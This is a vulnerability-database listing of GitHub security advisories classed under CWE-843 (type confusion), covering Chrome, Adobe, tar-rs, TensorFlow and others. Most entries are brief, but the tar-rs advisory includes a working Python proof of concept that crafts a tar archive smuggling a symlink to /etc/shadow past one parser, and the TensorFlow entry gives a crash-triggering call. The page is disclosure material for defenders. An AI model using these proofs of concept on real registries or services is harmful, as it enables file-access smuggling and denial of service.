Common Weakness Enumeration

CWE-843

Allowed

Access of Resource Using Incompatible Type ('Type Confusion')

Abstraction: Base · Status: Incomplete

The product allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type.

1041 vulnerabilities reference this CWE, most recent first.

GHSA-G933-C5V6-98JV

Vulnerability from github – Published: 2022-05-24 17:22 – Updated: 2022-05-24 17:22
VLAI
Details

Adobe Acrobat and Reader versions 2019.012.20035 and earlier, 2019.012.20035 and earlier, 2017.011.30142 and earlier, 2017.011.30143 and earlier, 2015.006.30497 and earlier, and 2015.006.30498 and earlier have a type confusion vulnerability. Successful exploitation could lead to information disclosure.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-8251"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-07-06T18:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Adobe Acrobat and Reader versions 2019.012.20035 and earlier, 2019.012.20035 and earlier, 2017.011.30142 and earlier, 2017.011.30143 and earlier, 2015.006.30497 and earlier, and 2015.006.30498 and earlier have a type confusion vulnerability. Successful exploitation could lead to information disclosure.",
  "id": "GHSA-g933-c5v6-98jv",
  "modified": "2022-05-24T17:22:25Z",
  "published": "2022-05-24T17:22:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8251"
    },
    {
      "type": "WEB",
      "url": "https://helpx.adobe.com/security/products/acrobat/apsb19-41.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-G97F-3HRX-C447

Vulnerability from github – Published: 2022-05-13 01:02 – Updated: 2025-10-22 00:31
VLAI
Details

Type confusion in V8 in Google Chrome prior to 59.0.3071.86 for Linux, Windows, and Mac, and 59.0.3071.92 for Android, allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-5070"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-10-27T05:29:00Z",
    "severity": "HIGH"
  },
  "details": "Type confusion in V8 in Google Chrome prior to 59.0.3071.86 for Linux, Windows, and Mac, and 59.0.3071.92 for Android, allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.",
  "id": "GHSA-g97f-3hrx-c447",
  "modified": "2025-10-22T00:31:29Z",
  "published": "2022-05-13T01:02:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5070"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2017:1399"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html"
    },
    {
      "type": "WEB",
      "url": "https://crbug.com/722756"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/201706-20"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-5070"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/98861"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1038622"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GCHP-Q4R4-X4FF

Vulnerability from github – Published: 2026-03-20 17:25 – Updated: 2026-05-19 16:05
VLAI
Summary
tar-rs incorrectly ignores PAX size headers if header size is nonzero
Details

Summary

As part of CVE-2025-62518 the astral-tokio-tar project was changed to correctly honor PAX size headers in the case where it was different from the base header.

However, it was missed at the time that this project (the original Rust tar crate) had a conditional logic that skipped the PAX size header in the case that the base header size was nonzero - almost the inverse of the astral-tokio-tar issue.

The problem here is that any discrepancy in how tar parsers honor file size can be used to create archives that appear differently when unpacked by different archivers.

In this case, the tar-rs (Rust tar) crate is an outlier in checking for the header size - other tar parsers (including e.g. Go archive/tar) unconditionally use the PAX size override.

Details

https://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600 https://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344

PoC

(originally posted by https://github.com/xokdvium)

I was worried that cargo might be vulnerable to malicious crates, but it turns out that crates.io has been rejecting both symlinks and hard links:

It seems like recent fixes to https://edera.dev/stories/tarmageddon have introduced a differential that could be used to smuggle symlinks into the registry that would get skipped over by astral-tokio-tar but not by tar-rs.

https://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600 https://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344

#!/usr/bin/env python3
B = 512


def pad(d):
    r = len(d) % B
    return d + b"\0" * (B - r) if r else d


def hdr(name, size, typ=b"0", link=b""):
    h = bytearray(B)
    h[0 : len(name)] = name
    h[100:107] = b"0000644"
    h[108:115] = h[116:123] = b"0001000"
    h[124:135] = f"{size:011o}".encode()
    h[136:147] = b"00000000000"
    h[148:156] = b"        "
    h[156:157] = typ
    if link:
        h[157 : 157 + len(link)] = link
    h[257:263] = b"ustar\x00"
    h[263:265] = b"00"
    h[148:155] = f"{sum(h):06o}\x00".encode()
    return bytes(h)


INFLATED = 2048
pax_rec = b"13 size=2048\n"

ar = bytearray()
ar += hdr(b"./PaxHeaders/regular", len(pax_rec), typ=b"x")
ar += pad(pax_rec)

content = b"regular\n"
ar += hdr(b"regular.txt", len(content))
mark = len(ar)
ar += pad(content)

ar += hdr(b"smuggled", 0, typ=b"2", link=b"/etc/shadow")
ar += b"\0" * B * 2

used = len(ar) - mark
if used < INFLATED:
    ar += b"\0" * (((INFLATED - used + B - 1) // B) * B)
ar += b"\0" * B * 2

open("smuggle.tar", "wb").write(bytes(ar))

tar-rs and astral-tokio-tar parse it differently, with astral-tokio-tar skipping over the symlink (so presumably the check from https://github.com/rust-lang/crates.io/blob/795a4f85dec436f2531329054a4cfddeb684f5c5/crates/crates_io_tarball/src/lib.rs#L92-L102 wouldn't disallow it).

use std::fs;
use std::path::PathBuf;

fn sync_parse(data: &[u8]) {
    println!("tar:");
    let mut ar = tar::Archive::new(data);
    for e in ar.entries().unwrap() {
        let e = e.unwrap();
        let path = e.path().unwrap().to_path_buf();
        let kind = e.header().entry_type();
        let link: Option<PathBuf> = e.link_name().ok().flatten().map(|l| l.to_path_buf());
        match link {
            Some(l) => println!("  {:20} {:?} -> {}", path.display(), kind, l.display()),
            None => println!("  {:20} {:?}", path.display(), kind),
        }
    }
    println!();
}

async fn async_parse(data: Vec<u8>) {
    println!("astral-tokio-tar:");
    let mut ar = tokio_tar::Archive::new(data.as_slice());
    let mut entries = ar.entries().unwrap();
    while let Some(e) = tokio_stream::StreamExt::next(&mut entries).await {
        let e = e.unwrap();
        let path = e.path().unwrap().to_path_buf();
        let kind = e.header().entry_type();
        let link: Option<PathBuf> = e.link_name().ok().flatten().map(|l| l.to_path_buf());
        match link {
            Some(l) => println!("  {:20} {:?} -> {}", path.display(), kind, l.display()),
            None => println!("  {:20} {:?}", path.display(), kind),
        }
    }
    println!();
}

#[tokio::main]
async fn main() {
    let path = std::env::args().nth(1).unwrap_or("smuggle.tar".into());
    let data = fs::read(&path).unwrap();
    sync_parse(&data);
    async_parse(data).await;
}
tar:
  regular.txt          Regular
  smuggled             Symlink -> /etc/shadow

astral-tokio-tar:
  regular.txt          Regular

Impact

This can affect anything that uses the tar crate to parse archives and expects to have a consistent view with other parsers. In particular it is known to affect crates.io which uses astral-tokio-tar to parse, but cargo uses tar.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.4.44"
      },
      "package": {
        "ecosystem": "crates.io",
        "name": "tar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.4.45"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33055"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T17:25:05Z",
    "nvd_published_at": "2026-03-20T07:16:13Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nAs part of [CVE-2025-62518](https://www.cve.org/CVERecord?id=CVE-2025-62518) the astral-tokio-tar project was changed to correctly honor PAX size headers in the case where it was different from the base header.\n\nHowever, it was missed at the time that this project (the original Rust `tar` crate) had a conditional logic that skipped the PAX size header in the case that the base header size was nonzero - almost the inverse of the astral-tokio-tar issue.\n\nThe problem here is that *any* discrepancy in how tar parsers honor file size can be used to create archives that appear differently when unpacked by different archivers.\n\nIn this case, the tar-rs (Rust `tar`) crate is an outlier in checking for the header size - other tar parsers (including e.g. Go `archive/tar`) unconditionally use the PAX size override.\n\n\n### Details\n\nhttps://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600\nhttps://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344\n\n### PoC\n\n(originally posted by https://github.com/xokdvium)\n\n\n\u003e I was worried that cargo might be vulnerable to malicious crates, but it turns out that crates.io has been rejecting both symlinks and hard links:\n\nIt seems like recent fixes to https://edera.dev/stories/tarmageddon have introduced a differential that could be used to smuggle symlinks into the registry that would get skipped over by `astral-tokio-tar` but not by `tar-rs`.\n\nhttps://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600\nhttps://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344\n\n```python\n#!/usr/bin/env python3\nB = 512\n\n\ndef pad(d):\n    r = len(d) % B\n    return d + b\"\\0\" * (B - r) if r else d\n\n\ndef hdr(name, size, typ=b\"0\", link=b\"\"):\n    h = bytearray(B)\n    h[0 : len(name)] = name\n    h[100:107] = b\"0000644\"\n    h[108:115] = h[116:123] = b\"0001000\"\n    h[124:135] = f\"{size:011o}\".encode()\n    h[136:147] = b\"00000000000\"\n    h[148:156] = b\"        \"\n    h[156:157] = typ\n    if link:\n        h[157 : 157 + len(link)] = link\n    h[257:263] = b\"ustar\\x00\"\n    h[263:265] = b\"00\"\n    h[148:155] = f\"{sum(h):06o}\\x00\".encode()\n    return bytes(h)\n\n\nINFLATED = 2048\npax_rec = b\"13 size=2048\\n\"\n\nar = bytearray()\nar += hdr(b\"./PaxHeaders/regular\", len(pax_rec), typ=b\"x\")\nar += pad(pax_rec)\n\ncontent = b\"regular\\n\"\nar += hdr(b\"regular.txt\", len(content))\nmark = len(ar)\nar += pad(content)\n\nar += hdr(b\"smuggled\", 0, typ=b\"2\", link=b\"/etc/shadow\")\nar += b\"\\0\" * B * 2\n\nused = len(ar) - mark\nif used \u003c INFLATED:\n    ar += b\"\\0\" * (((INFLATED - used + B - 1) // B) * B)\nar += b\"\\0\" * B * 2\n\nopen(\"smuggle.tar\", \"wb\").write(bytes(ar))\n```\n\n`tar-rs` and `astral-tokio-tar` parse it differently, with `astral-tokio-tar` skipping over the symlink (so presumably the check from https://github.com/rust-lang/crates.io/blob/795a4f85dec436f2531329054a4cfddeb684f5c5/crates/crates_io_tarball/src/lib.rs#L92-L102 wouldn\u0027t disallow it).\n\n```rust\nuse std::fs;\nuse std::path::PathBuf;\n\nfn sync_parse(data: \u0026[u8]) {\n    println!(\"tar:\");\n    let mut ar = tar::Archive::new(data);\n    for e in ar.entries().unwrap() {\n        let e = e.unwrap();\n        let path = e.path().unwrap().to_path_buf();\n        let kind = e.header().entry_type();\n        let link: Option\u003cPathBuf\u003e = e.link_name().ok().flatten().map(|l| l.to_path_buf());\n        match link {\n            Some(l) =\u003e println!(\"  {:20} {:?} -\u003e {}\", path.display(), kind, l.display()),\n            None =\u003e println!(\"  {:20} {:?}\", path.display(), kind),\n        }\n    }\n    println!();\n}\n\nasync fn async_parse(data: Vec\u003cu8\u003e) {\n    println!(\"astral-tokio-tar:\");\n    let mut ar = tokio_tar::Archive::new(data.as_slice());\n    let mut entries = ar.entries().unwrap();\n    while let Some(e) = tokio_stream::StreamExt::next(\u0026mut entries).await {\n        let e = e.unwrap();\n        let path = e.path().unwrap().to_path_buf();\n        let kind = e.header().entry_type();\n        let link: Option\u003cPathBuf\u003e = e.link_name().ok().flatten().map(|l| l.to_path_buf());\n        match link {\n            Some(l) =\u003e println!(\"  {:20} {:?} -\u003e {}\", path.display(), kind, l.display()),\n            None =\u003e println!(\"  {:20} {:?}\", path.display(), kind),\n        }\n    }\n    println!();\n}\n\n#[tokio::main]\nasync fn main() {\n    let path = std::env::args().nth(1).unwrap_or(\"smuggle.tar\".into());\n    let data = fs::read(\u0026path).unwrap();\n    sync_parse(\u0026data);\n    async_parse(data).await;\n}\n```\n\n```\ntar:\n  regular.txt          Regular\n  smuggled             Symlink -\u003e /etc/shadow\n\nastral-tokio-tar:\n  regular.txt          Regular\n```\n\n### Impact\n\nThis can affect anything that uses the `tar` crate to parse archives and expects to have a consistent view with other parsers. In particular it is known to affect crates.io which uses `astral-tokio-tar` to parse, but cargo uses `tar`.",
  "id": "GHSA-gchp-q4r4-x4ff",
  "modified": "2026-05-19T16:05:57Z",
  "published": "2026-03-20T17:25:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff"
    },
    {
      "type": "WEB",
      "url": "https://github.com/composefs/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33055"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alexcrichton/tar-rs/commit/de1a5870e603758f430073688691165f21a33946"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/alexcrichton/tar-rs"
    },
    {
      "type": "WEB",
      "url": "https://rustsec.org/advisories/RUSTSEC-2026-0068.html"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-62518"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "tar-rs incorrectly ignores PAX size headers if header size is nonzero"
}

GHSA-GCPP-P65G-2FX8

Vulnerability from github – Published: 2026-02-03 21:31 – Updated: 2026-02-09 18:30
VLAI
Details

Type Confusion in V8 in Google Chrome prior to 144.0.7559.132 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-1862"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-03T21:16:12Z",
    "severity": "HIGH"
  },
  "details": "Type Confusion in V8 in Google Chrome prior to 144.0.7559.132 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)",
  "id": "GHSA-gcpp-p65g-2fx8",
  "modified": "2026-02-09T18:30:23Z",
  "published": "2026-02-03T21:31:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1862"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop.html"
    },
    {
      "type": "WEB",
      "url": "https://issues.chromium.org/issues/479726070"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-1862"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GCVH-66FF-4MWM

Vulnerability from github – Published: 2022-02-10 00:21 – Updated: 2024-11-13 22:31
VLAI
Summary
`CHECK`-failures in Tensorflow
Details

Impact

The implementation of MapStage is vulnerable a CHECK-fail if the key tensor is not a scalar:

import tensorflow as tf
import numpy as np

tf.raw_ops.MapStage(
    key = tf.constant(value=[4], shape= (1,2), dtype=tf.int64),
    indices = np.array([[6]]),
    values = np.array([-60]),
    dtypes = [tf.int64], capacity=0, memory_limit=0,
    container='', shared_name='', name=None
)   

Patches

We have patched the issue in GitHub commit f57315566d7094f322b784947093406c2aea0d7d.

The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Faysal Hossain Shezan from University of Virginia. ~

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.6.0"
            },
            {
              "fixed": "2.6.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.7.0"
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-cpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-cpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.6.0"
            },
            {
              "fixed": "2.6.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-cpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.7.0"
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-gpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-gpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.6.0"
            },
            {
              "fixed": "2.6.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-gpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.7.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2022-21734"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-617",
      "CWE-843"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-02-03T19:45:02Z",
    "nvd_published_at": "2022-02-03T13:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact \nThe [implementation of `MapStage`](https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/map_stage_op.cc#L519-L550) is vulnerable a `CHECK`-fail if the key tensor is not a scalar:\n\n```python\nimport tensorflow as tf\nimport numpy as np\n\ntf.raw_ops.MapStage(\n    key = tf.constant(value=[4], shape= (1,2), dtype=tf.int64),\n    indices = np.array([[6]]),\n    values = np.array([-60]),\n    dtypes = [tf.int64], capacity=0, memory_limit=0,\n    container=\u0027\u0027, shared_name=\u0027\u0027, name=None\n)   \n``` \n\n### Patches\nWe have patched the issue in GitHub commit [f57315566d7094f322b784947093406c2aea0d7d](https://github.com/tensorflow/tensorflow/commit/f57315566d7094f322b784947093406c2aea0d7d).\n\nThe fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution \nThis vulnerability has been reported by Faysal Hossain Shezan from University of Virginia.\n~                                                                                             ",
  "id": "GHSA-gcvh-66ff-4mwm",
  "modified": "2024-11-13T22:31:19Z",
  "published": "2022-02-10T00:21:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gcvh-66ff-4mwm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21734"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/commit/f57315566d7094f322b784947093406c2aea0d7d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2022-58.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2022-113.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/tensorflow/tensorflow"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/map_stage_op.cc#L519-L550"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "`CHECK`-failures in Tensorflow"
}

GHSA-GG65-289V-HP7M

Vulnerability from github – Published: 2022-01-11 00:01 – Updated: 2022-01-14 00:02
VLAI
Details

There is a Vulnerability of accessing resources using an incompatible type (type confusion) in the MPTCP subsystem in smartphones. Successful exploitation of this vulnerability may cause the system to crash and restart.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-40037"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-01-10T14:10:00Z",
    "severity": "MODERATE"
  },
  "details": "There is a Vulnerability of accessing resources using an incompatible type (type confusion) in the MPTCP subsystem in smartphones. Successful exploitation of this vulnerability may cause the system to crash and restart.",
  "id": "GHSA-gg65-289v-hp7m",
  "modified": "2022-01-14T00:02:45Z",
  "published": "2022-01-11T00:01:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-40037"
    },
    {
      "type": "WEB",
      "url": "https://consumer.huawei.com/en/support/bulletin/2022/1"
    },
    {
      "type": "WEB",
      "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202201-0000001238736331"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-GGVV-6V25-R49R

Vulnerability from github – Published: 2022-05-13 01:20 – Updated: 2023-10-06 01:39
VLAI
Summary
ChakraCore RCE Vulnerability
Details

A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects ChakraCore. This CVE ID is unique from CVE-2018-8266, CVE-2018-8380, CVE-2018-8381.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Microsoft.ChakraCore"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.10.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2018-8384"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-07-21T22:11:50Z",
    "nvd_published_at": "2018-08-15T17:29:00Z",
    "severity": "HIGH"
  },
  "details": "A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects ChakraCore. This CVE ID is unique from CVE-2018-8266, CVE-2018-8380, CVE-2018-8381.",
  "id": "GHSA-ggvv-6v25-r49r",
  "modified": "2023-10-06T01:39:21Z",
  "published": "2022-05-13T01:20:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8384"
    },
    {
      "type": "WEB",
      "url": "https://github.com/chakra-core/ChakraCore/pull/5596"
    },
    {
      "type": "WEB",
      "url": "https://github.com/chakra-core/ChakraCore/commit/765bcd2c801eedc07fd0a4e90f69d41c483aa74a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/chakra-core/ChakraCore"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8384"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20210124194908/http://www.securityfocus.com/bid/104981"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/45431"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ChakraCore RCE Vulnerability"
}

GHSA-GH5F-292C-J673

Vulnerability from github – Published: 2022-05-14 02:22 – Updated: 2023-01-26 15:30
VLAI
Details

Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2016-4223 and CVE-2016-4224.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-4225"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-07-13T02:00:00Z",
    "severity": "HIGH"
  },
  "details": "Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code by leveraging an unspecified \"type confusion,\" a different vulnerability than CVE-2016-4223 and CVE-2016-4224.",
  "id": "GHSA-gh5f-292c-j673",
  "modified": "2023-01-26T15:30:32Z",
  "published": "2022-05-14T02:22:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-4225"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2016:1423"
    },
    {
      "type": "WEB",
      "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-093"
    },
    {
      "type": "WEB",
      "url": "https://helpx.adobe.com/security/products/flash-player/apsb16-25.html"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/201607-03"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00016.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00017.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/91718"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1036280"
    },
    {
      "type": "WEB",
      "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-427"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GH96-6FQ7-WJH8

Vulnerability from github – Published: 2026-06-30 21:31 – Updated: 2026-06-30 21:31
VLAI
Details

An unauthenticated attacker can crash the worklist server with a single crafted query when the server has a valid Called AE Title / storage directory, the expected lockfile, and at least one matching worklist record.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-44628"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-843"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-30T21:16:30Z",
    "severity": "HIGH"
  },
  "details": "An unauthenticated attacker can crash the worklist server with a single crafted query when the server has a valid Called AE Title / storage directory, the expected lockfile, and at least one matching worklist record.",
  "id": "GHSA-gh96-6fq7-wjh8",
  "modified": "2026-06-30T21:31:45Z",
  "published": "2026-06-30T21:31:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44628"
    },
    {
      "type": "WEB",
      "url": "https://github.com/DCMTK/dcmtk/releases/tag/latest"
    },
    {
